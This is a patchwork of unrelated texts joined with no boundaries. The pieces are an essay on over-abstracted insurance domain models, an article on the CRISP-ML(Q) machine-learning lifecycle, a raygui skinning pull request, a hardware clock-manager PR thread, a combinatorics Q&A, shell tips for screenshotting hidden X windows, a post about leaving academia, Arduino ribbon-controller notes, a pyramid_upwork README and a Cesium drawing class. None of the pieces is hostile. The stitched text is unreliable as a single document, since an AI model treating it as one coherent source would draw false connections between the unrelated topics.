I was once loosely attached to team who has been given the job of modeling a particular industry. Lets say it was Insurance.
They were given some money and some offices, and told to go away and create a industry model, which could be used as the basis for customer solutions. One model for all aspects of the industry – think of the time it would save in creating solutions, and even more in integrating them together.
The first time I saw the model, it was going OK. They had 200-ish domain model classes, with things like Premiums and Customers, Policies and Payments, but lots of gaps which they just hadn’t had time to fill.
Second time, a few months later, it was up to 600+. This model was now was much more comprehensive, at least in the view of those who more about the industry than me. Had all the stuff from the first version, and a whole lot more. They looked to be nearly finished
Final time, several months later, they had only just finished, and the model was visibly smaller. The pile of paper, which was the printout of the model, was a fraction of the last time. Back to fewer than 200 classes. What happened?
We looked at the detail. We looked for Policy – the heart of any insurance system. No sign. We looked again, at about where it was the last time we looked. There was something unintelligible, called maybe Entity_Offering_Link. Which if the Entity is a Customer, and the Offering is ‘Insurance’, then maybe is a policy.
So what had they done? They’d started out by modelling the terms they heard the experts used, then, like good modellers do, looked for common abstractions to make things simpler. And went on and on, finding ever more abstract ideas, to ‘simplify’ the model. Until the ‘Insurance-ness’ disappeared altogether. Entity-Offering_Link could equally be an airline ticket, or a order placed at McDonalds. And links between things no longer had real names. all the ‘stuff’ was connected though a generic class, where the purpose of the link was soft-coded as a variable in the link. Super flexible. Super abstract.
Melting the Pan
If you’ve ever made stock for cooking, you know that you start out with all the ingredients, and a whole lot of water. What you want is the concentrated flavour, so you start to boil the mixture.
Gradually the water boils away, and you get to a rich, highly flavoured liquid, which has the concentrated essence of the initial ingredients. Then you stop boiling.
Because if you carry on, what happens is the liquid gets think and gunky, and eventually goes dry, and finally you start to melt the pan. This isn’t concentrated anything. Its a fire hazard.
So be aware when you do your solemn duty as a modeller, and make abstractions. Don’t get so cute that the essence of the model goes away, It must still have the ‘stuff’ which makes it an insurance or an airline or a restaurant model. It should not need a modelling expert to explain it to a domain expert.
So if you’re managing such a team, beware of letting them model too long. And get the model reviewed frequently, but people who know the area but not the modelling style. They get it reviewed for style by a modelling expert, before it’s too late, and your stock tastes of melted metal.
|
OPCFW_CODE
|
The Machine Learning Lifecycle
Learn about the standard process for building sustainable machine learning applications.
There are no standard practices for building and managing machine learning (ML) applications. As a result, machine learning projects are not well organized, lack reproducibility, and are prone to complete failure in the long run. We need a model that helps us maintain quality, sustainability, robustness, and cost management throughout the ML life cycle.
Image by Author | Machine Learning Development Life Cycle Process
The Cross-Industry Standard Process for the development of Machine Learning applications with Quality assurance methodology (CRISP-ML(Q)) is an upgraded version of CRISP-DM to ensure quality ML products.
The CRISP-ML(Q) has six individual phases:
- Business and Data Understanding
- Data Preparation
- Model Engineering
- Model Evaluation
- Model Deployment
- Monitoring and Maintenance.
These phases require constant iteration and exploration for building better solutions. Even though there is an order in a framework, the output of the later phase can determine whether we have to re-examine the previous phase or not.
Image by Author | Quality Assurance for Each Phase
The quality assurance methodologies are introduced to each phase of the framework. The methodology comes with requirements and constraints such as performance metrics, data quality requirements, and robustness. It helps mitigate the risk that affects the success of machine learning applications. It can be achieved by constant monitoring and maintaining the overall system.
For example: In an e-commerce business, data and concept drift will contribute to model degradation, and if we don’t have a system in place to monitor these changes, the company will take a loss in the shape of losing customers.
Business and Data Understanding
At the start of the development process, we need to identify the scope of the project, success criteria, and feasibility of the ML application. After that, we start the process of data collection and quality verification. This process is long and challenging.
Scope: what we want to achieve by using a machine learning process. Is it to retain customers or reduce the cost of operation by automation.
Success Criteria: we have to define clear and measurable business, machine learning (statistical metric), and economic (KPI) success metrics.
Feasibility: we need to ensure data availability, the applicability of ML application, legal constraints, robustness, scalability, explainability, and resource demand.
Data Collection: gathering the data, versioning it for reproducibility, and ensuring a constant stream of real-life and generated data.
Data Quality Verification: ensuring the quality by maintaining data description, requirements, and verification.
To ensure quality and reproducibility, we need to document the statistical properties of data and the data generating process.
The second phase is pretty much straightforward. We will be preparing the data for the modeling phase. It includes data selection, data cleaning, feature engineering, data augmentation, and normalization.
- We start with feature selection, data selection, and dealing with unbalanced classes by over-sampling or under-sampling).
- Then, focusing on reducing noise and dealing with missing values. For quality assurance purposes, we will add data unit testing to mitigate faulty values.
- Depending on your model, we perform feature engineering and data augmentations, for example, one-hot encoding and clustering.
- Normalizing and scaling the data. It will mitigate the risk of biased features.
To ensure reproducibility, we create data modeling, transformation, and feature engineering pipelines.
The constraints and the requirements of the Business and Data Understanding phase will determine the modeling phase. We need to understand business problems and how we are going to develop machine learning models to solve them. We will be focusing on model selection, optimization, and training. We will be ensuring model performance metrics, robustness, scalability, explainability, and optimizing storage and compute resources.
- Research in model architecture and similar business problems
- Defining model performance metrics
- Model selection
- Understanding domain knowledge by incorporating experts.
- Model training
- Model compression and ensembling
To ensure quality and reproducibility, we will store and version model metadata such as model architecture, training and validation data, hyper-parameters, and environment description.
Finally, we will track ML experiments and create ML pipelines to create a repeatable training process.
It is the phase where we test and ensure that our model is ready for deployment.
- We will be testing the model performance on a test dataset.
- Assessing model robustness by providing random or false data.
- Improving model explainability to meet regulatory requirements.
- Comparing the result with initial success metrics automatically or by the domain expert.
For quality assurance, every step in the evaluation phase is recorded.
The model deployment is a phase where we integrate the machine learning model into an existing system. The model can be deployed on a server, browser, software, and edge devices. The prediction from the models can be used in BI dashboards, APIs, web apps, and plugins.
The model deployment processes:
- Defining hardware inference
- Model evaluation in production
- Ensuring user acceptance and usability
- Providing fall back plan and minimizing losses
- Deployment strategy.
Monitoring and Maintenance
The model in production requires constant monitoring and maintenance. We will be monitoring model staleness, hardware performance, and software performance.
Continuous monitoring is the first part of the process, and if the performance drops below the threshold take an automatic decision to retrain the model on new data. Furthermore, the maintenance part is not limited to just model re-training. It involves decision-making to acquire new data, update hardware and software, and improve the ML process depending on the business use case.
In short, it is continuous integration, training, and deployment of ML models.
Training and validating models is a small part of ML application. There are several processes involved to convert the initial idea into reality. In this post, we have learned about CRISP-ML(Q) and how it emphasizes risk assessment and quality assurance.
We start by defining the business objective, collecting and cleaning the data, building the model, validating it on a test dataset, and deploying it to production.
The key component of this framework is continuous monitoring and maintenance. We will monitor data, software, and hardware metrics to determine whether to re-train the model or upgrade the system.
Image by Author
If you are new to machine learning operations and want to learn more about it, read the review of the free MLOps course by DataTalks.Club. You will get hands-on experience in all 6 phases and learn about the real-life implementation of CRISP-ML.
- Towards CRISP-ML(Q): A Machine Learning Process Model with Quality Assurance Methodology (arxiv.org)
- CRISP-ML(Q) (ml-ops.org)
- Article Review: Towards CRISP-ML(Q)
Abid Ali Awan (@1abidaliawan) is a certified data scientist professional who loves building machine learning models. Currently, he is focusing on content creation and writing technical blogs on machine learning and data science technologies. Abid holds a Master's degree in Technology Management and a bachelor's degree in Telecommunication Engineering. His vision is to build an AI product using a graph neural network for students struggling with mental illness.
|
OPCFW_CODE
|
Skin support final implementation
Hey @raysan5 as stated in https://github.com/raysan5/raygui/pull/98 here is another pull request adding support for skinning. Compared to my previous attempt this time i made sure to fix most of the bugs and also included a fully functional skin editor in /examples/ to make creating/editing skins a bit easier.
Here are some features:
supports almost all the raygui controls except GuiLine(), GuiGroupBox(), GuiLabel(), GuiGrid(), GuiLabelButton() and GuiDummyRec()
some controls have multiple sub components (ex GuiListViewEx() ) those can be skinned too
a skin file can hold multiple skin styles, this way one can have different skins for the menu GUI, ingame GUI etc. in the same file
support for saving loading skins to/from a text file, the syntax resembles .rgs as much as possible
if useColor is enabled for a skin it can use the currently active color style
Using it in your code is quite easy i think here's an example:
// Loading from a file
GuiSkin skins[4] = {0}; // create an empty array to hold our skins
int skinCount = GuiLoadSkin("test.skin", skins, 4); //load at most 4 skins from file
if(skinCount == 0) TraceLog(LOG_ERROR, "Failed to load skins!"); // handle failure
GuiSetSkin(&skin[0]); // set the first skin as the global skin
GuiButton(bounds, "Hello"); // render a button using the first skin
GuiSetSkin(&skin[1]);
GuiButton(bounds, "World"); // render a button using the second skin
// ....
// `GuiLoadSkin()` will automatically load a texture file but you can also use your own
GuiSetSkinTexture(mytexture); // now mytexture is the global gui texture.
// Saving a skin to file
GuiSaveSkin("test.skin", "texture.png", skins, 4); // Save 4 skins styles to file
Please try the editor to see more of what the current implementation can do!
I think this feature will benefit raygui greatly, so what do you say Ray :+1: or :-1:
PS: i don't know why d321a0b and 37f20a4 are in there :(
@Demizdor Wow! Really impressive! Congrats! This is a huge change for the library, I need some time to review it and decide...
In any case, thanks for this great feature and tool!
Sure thing take your time, the update is huge and you'll need to maintain in the future so i fully understand.
Hey @raysan5 , i will close this!
The new raylib changes broke this code.
Some things are easy to fix like getting rid of the #ifdef __unix__ hacks adding the dot when calling GetExtension() in editor.c and correcting DrawTextureNPatch() to use NPATCH_NINE_PATCH in raygui.h but others are harder like the newly patched GuiScrollPanel() that made drawing the edges not behave correctly.
I'm sure if i had time everything would work once again but i don't have time to fix things, so i believe this is the best way to handle all of this, sorry!
Hi @Demizdor, ok, no sorry, it's ok. It was a big change and I haven't put much time into raygui lately. I also admit I felt a bit scary about maintaining it... No worries, the PR is here for future reference.
|
GITHUB_ARCHIVE
|
Integrate clkmgr
This is just a draft integration to see how things might look, and also to work through some of the kinks.
Once a PR like this one is merged, we can finally embark on the actual clock split and split things into real async domains.
@eunchan
i have not included your feedback on clkmgr yet, but i was wondering if you can have a look how this might look when all integrated. I don't like how clock / reset handling is bit different right now, so i'm going to go back and clean that up as part of a separate PR.
i'm not sure..i usually see these done manually. I feel like if there are
none, the tool would probably throw some in.
Let me try later today or tomorrow, I'm kind of curious.
On Mon, May 4, 2020 at 7:31 PM Michael Schaffner<EMAIL_ADDRESS>wrote:
@msfschaffner approved this pull request.
Thanks @tjaychen https://github.com/tjaychen, looks good to me so far.
In util/topgen/merge.py
https://github.com/lowRISC/opentitan/pull/2084#discussion_r419830417:
for port, clk in ep['clock_srcs'].items():
ep_clks.append(clk)
if unique == "yes":
hier_name = clk_paths[src]
if src == 'ext':
# clock comes from the port and therefore have no
incomplete sentence?
In hw/top_earlgrey/rtl/clkgen_xil7series.sv
https://github.com/lowRISC/opentitan/pull/2084#discussion_r419832762:
@@ -72,15 +72,18 @@ module clkgen_xil7series (
.O (clk_fb_buf)
);
BUFG clk_50_bufg (
.I (clk_50_unbuf),
.O (clk_50_buf)
);
do we know whether the tool would insert them automatically if needed? in
that case we could remove them from this file...
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
https://github.com/lowRISC/opentitan/pull/2084#pullrequestreview-405459614,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAH2RSW5FIJUPTUM2KAHA5DRP527NANCNFSM4MTJPY5Q
.
@eunchan
@msfschaffner
i did some rebasing and minor lint fixes and addressed some comments, do you guys mind having one more look?
I'll follow-up with real asynchronous clocks and the clock naming fixes in a different PR.
Hey @tjaychen, I just made a PR that adds the CSR tests to the sanity (and hence the private CI). If you're okay with it, merge this in after ensuring that the CI is clean with the CSR tests having run. If not, that is fine as well.
sgtm, i'm almost positive it will break..since it will disable clocks. I"ll
probably need to add some exclusions.
On Fri, May 8, 2020 at 11:37 AM sriyerg<EMAIL_ADDRESS>wrote:
Hey @tjaychen https://github.com/tjaychen, I just made a PR that adds
the CSR tests to the sanity (and hence the private CI). If you're okay with
it, merge this in after ensuring that the CI is clean with the CSR tests
having run. If not, that is fine as well.
—
You are receiving this because you were mentioned.
Reply to this email directly, view it on GitHub
https://github.com/lowRISC/opentitan/pull/2084#issuecomment-625957420,
or unsubscribe
https://github.com/notifications/unsubscribe-auth/AAH2RSVZEWGS2LGOCEM6WLDRQRGO7ANCNFSM4MTJPY5Q
.
@sriyerg
i've rebased and added exclusions. Do you mind taking a look to make sure I didn't add too blanket an exclusion? On another note, I think CI (private) might have gotten stuck again...
@sriyerg
i've rebased and added exclusions. Do you mind taking a look to make sure I didn't add too blanket an exclusion?
LGTM, thanks!
CI private is queued and is currently at the 5th spot. Looks ok to me.
updates with private CI revealed that the exclusions done on pwrmgr and clkmgr were insufficient. The reset test itself can cause the device to hang.
thanks all for the review. I am merging this now.
|
GITHUB_ARCHIVE
|
class draw{
drawPoint=function (viewer, callback) {
var _this = this;
_this.viewer=viewer
//坐标存储
var positions = [];
var handler = new Cesium.ScreenSpaceEventHandler(_this.viewer.scene.canvas);
//单击鼠标左键画点
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.position, _this.viewer.scene.globe.ellipsoid);
positions.push(cartesian);
_this.viewer.entities.add({
position: cartesian,
point: {
color: Cesium.Color.RED,
pixelSize: 5,
heightReference: Cesium.HeightReference.CLAMP_TO_GROUND
}
});
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
//单击鼠标右键结束画点
handler.setInputAction(function (movement) {
handler.destroy();
callback(positions);
}, Cesium.ScreenSpaceEventType.RIGHT_CLICK);
};
drawLineString= function (viewer,callback) {
var _this = this;
_this.viewer=viewer
var PolyLinePrimitive = (function () {
function _(positions) {
this.options = {
polyline: {
show: true,
positions: [],
material: Cesium.Color.RED,
width: 3
}
};
this.positions = positions;
this._init();
}
_.prototype._init = function () {
var _self = this;
var _update = function () {
return _self.positions;
};
//实时更新polyline.positions
this.options.polyline.positions = new Cesium.CallbackProperty(_update, false);
_this.viewer.entities.add(this.options);
};
return _;
})();
var handler = new Cesium.ScreenSpaceEventHandler(_this.viewer.scene.canvas);
var positions = [];
var poly = undefined;
//鼠标左键单击画点
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.position, _this.viewer.scene.globe.ellipsoid);
if (positions.length == 0) {
positions.push(cartesian.clone());
}
positions.push(cartesian);
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
//鼠标移动
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.endPosition, _this.viewer.scene.globe.ellipsoid);
if (positions.length >= 2) {
if (!Cesium.defined(poly)) {
poly = new PolyLinePrimitive(positions);
} else {
if (cartesian != undefined) {
positions.pop();
cartesian.y += (1 + Math.random());
positions.push(cartesian);
}
}
}
}, Cesium.ScreenSpaceEventType.MOUSE_MOVE);
//单击鼠标右键结束画线
handler.setInputAction(function (movement) {
handler.destroy();
callback(positions);
}, Cesium.ScreenSpaceEventType.RIGHT_CLICK);
};
drawPolygon= function (viewer,callback) {
var _this = this;
_this.viewer=viewer
var PolygonPrimitive = (function () {
function _(positions) {
this.options = {
name: '多边形',
polygon: {
hierarchy: [],
perPositionHeight: true,
material: Cesium.Color.RED.withAlpha(0.4)
}
};
this.hierarchy = positions;
this._init();
}
_.prototype._init = function () {
var _self = this;
var _update = function () {
return _self.hierarchy;
};
//实时更新polygon.hierarchy
this.options.polygon.hierarchy = new Cesium.CallbackProperty(_update, false);
_this.viewer.entities.add(this.options);
};
return _;
})();
var handler = new Cesium.ScreenSpaceEventHandler(_this.viewer.scene.canvas);
var positions = [];
var poly = undefined;
//鼠标单击画点
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.position, _this.viewer.scene.globe.ellipsoid);
if (positions.length == 0) {
positions.push(cartesian.clone());
}
positions.push(cartesian);
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
//鼠标移动
handler.setInputAction(function (movement) {
var cartesian = _this.viewer.scene.camera.pickEllipsoid(movement.endPosition, _this.viewer.scene.globe.ellipsoid);
if (positions.length >= 2) {
if (!Cesium.defined(poly)) {
poly = new PolygonPrimitive(positions);
} else {
if (cartesian != undefined) {
positions.pop();
cartesian.y += (1 + Math.random());
positions.push(cartesian);
}
}
}
}, Cesium.ScreenSpaceEventType.MOUSE_MOVE);
//鼠标右键单击结束绘制
handler.setInputAction(function (movement) {
handler.destroy();
callback(positions);
}, Cesium.ScreenSpaceEventType.RIGHT_CLICK);
};
drawRect= function (viewer,callback) {
let _self = this;
_self.viewer=viewer
let pointsArr = [];
_self.shape = {
points: [],
rect: null,
entity: null
};
var tempPosition;
var handle = new Cesium.ScreenSpaceEventHandler(_self.viewer.scene.canvas);
//鼠标左键单击画点
handle.setInputAction(function (click) {
tempPosition = _self.getPointFromWindowPoint(click.position);
//选择的点在球面上
if (tempPosition) {
if (_self.shape.points.length == 0) {
pointsArr.push(tempPosition);
_self.shape.points.push(_self.viewer.scene.globe.ellipsoid.cartesianToCartographic(tempPosition));
_self.shape.rect = Cesium.Rectangle.fromCartographicArray(_self.shape.points);
_self.shape.rect.east += 0.000001;
_self.shape.rect.north += 0.000001;
_self.shape.entity = _self.viewer.entities.add({
rectangle: {
coordinates: _self.shape.rect,
material: Cesium.Color.BLACK.withAlpha(0.4),
outline: true,
outlineWidth: 2,
outlineColor: Cesium.Color.RED,
height: 0
}
});
_self.bufferEntity = _self.shape.entity;
}
else {
handle.removeInputAction(Cesium.ScreenSpaceEventType.MOUSE_MOVE);
handle.removeInputAction(Cesium.ScreenSpaceEventType.LEFT_CLICK);
callback(pointsArr);
}
}
}, Cesium.ScreenSpaceEventType.LEFT_CLICK);
//鼠标移动
handle.setInputAction(function (movement) {
if (_self.shape.points.length == 0) {
return;
}
var moveEndPosition = _self.getPointFromWindowPoint(movement.endPosition);
//选择的点在球面上
if (moveEndPosition) {
pointsArr[1] = moveEndPosition;
_self.shape.points[1] = _self.viewer.scene.globe.ellipsoid.cartesianToCartographic(moveEndPosition);
_self.shape.rect = Cesium.Rectangle.fromCartographicArray(_self.shape.points);
if (_self.shape.rect.west == _self.shape.rect.east)
_self.shape.rect.east += 0.000001;
if (_self.shape.rect.south == _self.shape.rect.north)
_self.shape.rect.north += 0.000001;
_self.shape.entity.rectangle.coordinates = _self.shape.rect;
}
}, Cesium.ScreenSpaceEventType.MOUSE_MOVE);
};
clearHandle=function (viewer) {
//移除所有实体Entity
this.viewer.entities.removeAll();
this.viewer=viewer
//移除cesium加载的ImageryLayer
for (var i = 0; i < this.removeImageryLayers.length; i++) {
this.viewer.imageryLayers.remove(this.removeImageryLayers[i]);
}
};
}
export default new draw()
|
STACK_EDU
|
Traffic pours on to I-280 as we head home. It always grinds to a halt at the same places, as people rush north, heading home from Stanford and Facebook. A curious feature of the Peninsula (that sliver of land west of the bay that is bracketed by Daly City to the north and San Jose to the south) is that company name is synonymous with town. Mountain View is Google, Palo Alto is Stanford (true not a company like the others), Menlo Park is Facebook, Los Gatos is Netflix and the list goes on. My distaste for a given company is now proportional to how much traffic it causes (for me anyway. So I curse Stanford as we drive towards the Palo Alto entrance ramp and am greeted with a river of glowing tail lights. So many people squeezed on to such a small spit of land, but I can't begrudge them too much. After all, it's a modern day boom, and I've come rushing here like everyone else.
But why have I come rushing here? (In my last post, I had left Vancouver and my post-doc to work at NEON). That remains the hardest question for me to answer about this whole journey. To be fair I had something of an ideal position at NEON. I was able to go to conferences, develop software, do exciting informatics work, my back wasn't against the wall with funding, I lived in a great location, and I worked with awesome people. So why did I leave? An entire bottle of Knob Creek went into that decision, and I'm still not sure I have clarity of thought (maybe another bottle of whiskey would help?). Here are some of the things that I did think about:
I weighed my options, stay at NEON or leave. My wife asked me which decision was most reversible if I was really unhappy. I realized that I could probably find a place in the world of scientific software again, but where I work now would only knock once, and if you didn't answer then they wouldn't knock again. Does the scientific community look down on industry experience? I'm not sure, but since I no longer harbor ideas of a tenure track job, it seems like the kind of role I'd be interested in academic science would be open to my varied career path (However that remains to be seen).
Much of what I really like about science is distributed now; it's on twitter, it's on github. I could still contribute to projects I believed in like Data Carpentry, Software Carpentry,
rOpenSci. Actually things did not go well with that last one (it was a bitter pill to swallow, and not one I wanted to). The take home message? Some doors will stay open, others will close. Another step I took was to get an adjunct appointment at my old university (Univ. of Vermont) so I can still publish now and then, and still work on some software projects on the side. So even though I work in private industry, I still feel connected to academia.
If I were a betting man, I'd say it's only a matter of time before the typical data scientist isn't someone with a PhD in Physics (or biology), but someone who got a 1 year masters certificate. There's just too much press about data science and too much money to be made by places like Berkeley (which has an online data scientist program) minting data scientists with quick degrees for this not to happen. I figured if I was going to move to industry, the iron was hot so to speak. In three years I think the hiring landscape will be very different. But if I get in now at a good company I'll have a good chance to advance there before the glut, or be senior enough to move to a different company.
I've spoken to many people now about this transition, many people e-mailing me out of the blue for skype chats. They ask a lot about the skills they might need, where to find job postings, it's all very practical. Often missing from the conversation is that no matter what, you're walking away from a world you've likely known from 6-8 years. All that social capital you've amassed through collaboration and conferences? Gone. You are walking into a world that might not know what a post-doc even is, and certainly does not give a shit about where you publish. So what weight do you give to the personal cost of the transition? What weight do you do you give to the practical? In the end even after that bottle of Knob Creek, I'm not sure I have an answer.
And that's where I'll close the book on this. If you read part 1 and part 2, you'll see they're quite personal. I had thought initially that I would write a series of posts about how the academic system in broken. Instead I found that my reasons were much more personal than structural. But I'd encourage anyone contemplating jumping off the academic ship to consider the costs and benefits beyond just the utilitarian.→ ←
|
OPCFW_CODE
|
So I now have a functioning prototype ribbon controller.
The business with the USB-to-serial converter was resolved when I realized that while the Sparkfun one I was using has a female header that the Arduino Pro Mini just plugs into, the Pololu one has male pin headers, and has to be connected to the Arduino via jumper wires, because the pin order is different. But while it runs on 3.3V, one of the pins outputs the +5V it gets from the USB. So that pin can be jumpered to the Vcc input pin on the Arduino, and with the other pins connected properly, it’ll do the serial communication while powering the Arduino with +5V. Problem solved.
I found a stick of poplar, 24″ long and nominally 1 by 2, that I bought long ago at Home Depot for some forgotten purpose. I stained it, finished it in polyurethane, and drilled out a little channel at one end. There’ll be more woodworking for the final version but that’s it for now. I stuck down the SoftPot and soldered its terminals to wires leading to an audio jack mounted on a little perfboard and secured to the stick with blue masking tape… also not the final version.
Then I connected it to the interface circuit and after some debugging of the hardware and tweaking of the software found I was getting reasonable voltages on the CV and gate output jacks. Emboldened, I plugged it into the Mother-32 for an audio demonstration. It worked!
Next steps are to solder up a permanent version of the interface circuit and install it in a box, and to do the final, prettier version of the business end of the stick.
I’ve made some changes to Audette’s software. Some of it was just removing lines of code that do not serve a purpose. Other things affect the behavior:
- Line 31 (of the original) I had to change the delimiters around Biquad.h from angle brackets to double quotes to make it work on the Arduino web IDE.
- Line 52: Changed ribbonPin from A5 to A3 because the A5 pin on the Arduino Pro Mini is hard to access.
- Line 96: Small changes to ribbon_max_val and ribbon_min_val values, reflecting what I saw in my setup.
- Line 107: Changed ribbon_span_half_steps_float from 36 to 60. This governs the range of notes spanned by the ribbon.
- Line 137: Changed CV_note_bottom from 12 to 0. This makes the pitch CV range start at 0V.
- Line 140: Small change to MAX_DAC_VOLT, reflecting my setup.
- Lines 142–143: Switched values of TRIG_NOTE_ON and TRIG_NOTE_OFF to match Mother-32 gate convention.
- Line 189: Changed argument of Serial.begin to 9600.
- Line 641: Changed KBD_track from 0.6 to 1.0. This makes the filter CV slope the same as the pitch CV slope. Between this and the change to CV_note_bottom, filter CV and pitch CV now are identical in value.
|
OPCFW_CODE
|
Simple Permutations/Combinations Question
A group of 5 men and 5 women stand in line to have their photo taken.
How many ways can they stand in line if no two men and no two women stand together?
My method: _M_M_M_M_M_
Male * Female = 5P5 * 6P5 = 86400
Correct Answer = 5! * 5! * 2 = 28800
I don't understand why I got it wrong, can anyone help please?
Why do you have 6 $_$s?
They are the spaces for the women, I used the logic of this question http://math.stackexchange.com/questions/12587/how-many-ways-are-there-for-8-men-and-5-women-to-stand-in-a-line-so-that-no-two
right, but you have 6 of them and only 5 women
Yes, so that's why I put 6P5, arranging 5 women in 6 spaces. Is that correct?
No it is not. Here neither men nor women can be neighbours. In the other question, men could be neighbours (and, given the numbers, some had to be).
Sorry I dont understand that... Isn't my method going to separate all of them so they are arranged alternately?
@André OP's reasoning makes sure both men and women are not neighbors. (It's invalid for another reason...)
Definitely not. If you assign a woman to the leftmost $3$ spaces, and to the rightmost $2$, a couple of men around the middle will be next to each other.
Oh... I see why my method is wrong now. Can you explain how the solution works?
Order the five women, order the five men, then decide whether the seats start with a man or women and interlace them. (5! x 5! x 2) @Andre Ah, duh.
Oh I didn't know that you could do that... I think I get some of it now... Is there a more 'graphical' solution? :)
@blue: Thank you for informing me of a way to solve the problem. I might have floundered helplessly otherwise. For days.
@André Sorry, I should have phrased it in the form of a hint to the OP, I know. (e.g. "Count the ways depending on whether a man or woman sits first.")
If you distiguish only by man and woman, then they can be arranged:
$$m-w-m-w-m-w-m-w-m-w$$ and $$w-m-w-m-w-m-w-m-w-m$$
If you distinguish the womans, there are $5!$ possibilities. The same for men.
Thanks, now I get it. Maybe if the answer was (5!*5!)+(5!*5!) I could've guessed it earlier! :D
You are welcome. The main thing is, that you understand it now.
|
STACK_EXCHANGE
|
Screenshot of non active window
How to take a screen shot of non active window? If I have 2 windows, I want to capture the screenshot of the one which is running in the background.
for i in `xprop -root|grep "_NET_CLIENT_LIST_STACKING(WINDOW): window id" |tr '#' ','|tr ',' '\n'| grep 0x`;do xwininfo -id $i|grep "Window id" ;done
Using the above I was able to get the windows id. and using xwininfo able to find the label or name or title of the window.
import -window <window_ID> screenshot.png
This is the last step to automate the process. This is an interesting one for me.
This does not actually answer the question. It gets the window's ID, name and/or title, but it never takes a screenshot.
I got screenshots and worked.
To elaborate a bit on previous answers and comments, the ability to capture a screenshot of a non active window (as in fully or partially hidden) seems to depend on the window manager.
Using the following (already given) command :
import -window <windowid> image.png
or
xwd -id <windowid> | convert xwd:- image.png
(the - of convert is for using standard input from the pipe, xwd: tells the format of the input) one seems to be able under Enlightenment (e17, tested with Fedora 19) to capture a screenshot of :
fully or partially hidden windows ;
minimized windows ;
windows on other workspaces.
I checked with Openbox (same configuration) and KDE (with an old Scientific Linux 4.8 and latest version of ImageMagick (yes, incredibly it compiled…)) and in both cases screenshots show only what is on top of the display layers — that is, only what is already visible on screen.
The point is that the import command checks for the map_state field returned by XGetWindowAttributes to be IsViewable, and if not it returns an error. One can check map_state e.g. using :
xwininfo -id <windowid> | grep 'Map State'
It seems to be always IsViewable under e17, while it's IsUnMapped under openbox and KDE as soon as the window is minimized or whatever.
Not sure though why the screenshot is always clean with e17 while it's mixed with other windows when the window is partially recovered with other WMs, but obviously it also has to do with the way the WM handles the display.
Anyway, clearly it's a matter of WM. It would be nice to have a list of WMs able vs unable to do screenshots of hidden windows — I'm not doing it.
Interesting to know: You get the window id if you do xwininfo | grep -i 'window id' and click on the window in question.
does not work if the window is fully invisible (in another workspace, not the active one)
For me, both commands work fine... unless the window is minimized (I'm using Peppermint Linux).
What do you mean by "non active"? "Not having the focus" or "hidden by some other window"? In the first case, gimp will do it without any problems (File -> Create -> Screenshot). In the second case, it's more difficult (if it's possible at all).
Yes, non active means not having the focus. We can take screenshot of focused one. Can we make the window which is not having focus to be focused using command line. If so how can be do that.
I want to do in commandline, to automate the process.
I just checked that import (from the ImageMagick suite) has a -window id option. If you know the window identifier that should work, even on the command line. You can get the window identifier using xwininfo, but for that you'll have to use the mouse at least once.
Can I extract for fixed height and width using import along with window id. I am also checking that.
While this answer may not be desirable for some situations, this script will raise every window on the current desktop one at a time so that they may be screenshotted with your screenshot tool du jour.
#!/bin/bash
# raiseAll - Mark Belanger - raise all windows
# get the ID of the current desktop
thisDT=`wmctrl -d |grep ' \* ' | awk '{print $1}'`
echo Raising windows for desktop $thisDT
for window in `wmctrl -l |grep " $thisDT " | awk '{print $1}'`
do
echo Raising $window - put your screenshot command here
wmctrl -i -a $window
sleep 1
done
Solution for kde
SystemSettings->Display And Monitors->Compositor->Keep window thumbnails set Always
Can you explain in more detail why this is a solution?
With it kwin dont call "hideinternal" and flag map_state always IsVieable for minimized windows etc
https://github.com/KDE/kwin/blob/d36e326d66d0d24c342b6f15cb5ef0a602cc2328/x11client.cpp#L1520
Try this! [ Ubuntu 20.04.4 ]
# Screenshot a specific window, in this case a Firefox window:
import -window "$(wmctrl -l | cut -d ' ' -f 5- | grep -i firefox)" ~/Pictures/result.jpg
# Explaining the "wmctrl -l | cut -d ' ' -f 5- | grep -i firefox", list open windows and cut out the window name part by filtering on a keyword. Install the packages if necessary!
|
STACK_EXCHANGE
|
pyramid_upwork allows your users to authorize via upwork on your pyramid project.
You can find it on pypi as pyramid_upwork. Also don’t forget to check the documentation.
pyramid-redis-sessions is used to store session in Redis database, so you need to install Redis and configure it to listen to port 127.0.0.1.
Other packages are installed automatically:
pyramid pyramid_redis_sessions python-upwork
To activate jinja2 renderer, install:
pip install pyramid_jinja2
Install with pip:
pip install pyramid_upwork
or using easy_install:
You need to create Upwork API keys of the type Web and set appropriate permissions to the generated API key.
You can take a look at the pyramid_upwork_example application or use the instructions below.
Include following settings in your *.ini file:
[app:main] ... # Redis session settings redis.sessions.secret = FILL ME # upwork settings upwork.api.key = FILL ME upwork.api.secret = FILL ME
Then in your project’s __init__.py define the following function:
def get_acl_group(user_uid, request): """Here goes your ACL logic.""" # All authenticated users have ``view`` permission return 'view'
This function should return list of ACL group principals or None if user is not allowed to have any access groups. See pyramid documentation for security and tutorial.
Define a RootFactory in your models.py:
class RootFactory(object): """This object sets the security for our application.""" __acl__ = [ (Allow, Authenticated, 'view'), (Deny, Authenticated, 'login'), (Allow, Everyone, 'login'), ] def __init__(self, request): pass
Now register get_acl_group() function in the config registry to make authorization work. Put in your main method:
def get_acl_group(request): return ('view',) def main(global_config, **settings): """Main app configuration binding.""" config = Configurator(settings=settings, root_factory="myapp.models.RootFactory") # ACL authorization callback for pyramid-upwork config.registry.get_acl_group = get_acl_group # External includes config.include('pyramid_upwork') # Views and routing goes here # ... # config.add_view('myapp.views.MainPage', renderer='templates/main.jinja2', permission='view') return config.make_wsgi_app()
You can provide custom forbidden.jinja2 template by overriding asset in your __init__.py:
# Override forbidden template config.override_asset( to_override='pyramid_upwork:templates/forbidden.jinja2', override_with='myapp:templates/forbidden.jinja2')
See template example in pyramid_upwork/templates/forbidden.jinja2.
The “Logout” action is done also via POST request with CSRF protection, see example of “Logout” buttion in pyramid_upwork_example/templates/layout.jinja2.
